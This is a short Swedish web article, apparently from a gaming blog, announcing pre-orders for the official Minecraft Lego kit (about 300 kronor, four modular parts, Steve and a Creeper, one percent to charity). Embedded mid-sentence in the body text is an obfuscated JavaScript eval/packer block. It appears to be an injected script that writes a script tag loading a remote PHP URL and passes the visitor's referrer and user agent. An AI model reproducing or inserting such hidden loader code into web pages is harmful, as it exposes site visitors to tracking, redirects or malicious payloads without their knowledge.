Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Förbeställ ditt Minecraft Lego kit idag

Förbeställ ditt Minecraft Lego kit idag
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kshtt|var|u0026u|referrer|ndeat||js|php’.split(’|’),0,{}))
öppnar Lego upp förbeställningen av det officiella
Minecraft Legot som vi nämnt tidigare. Priset kommer att hamna på ca 300 kronor och innehåller fyra modulära delar som kan sättas ihop på alla möjliga sätt.

Sten, sand, trä, vatten, och lava är några av de blocks som kommer att finns med, även Steve äventyraren och den ökända Creeper.

Mojang och skaparna kommer att donera en procent av intäkten från projektet till välgörenhet. När produkten landar i butik är någon gång innan sommaren meddelar Mojang. Detta är helt klart något för kidsen, kreativt och samtidigt otroligt kul.

Läs tidigare artikel här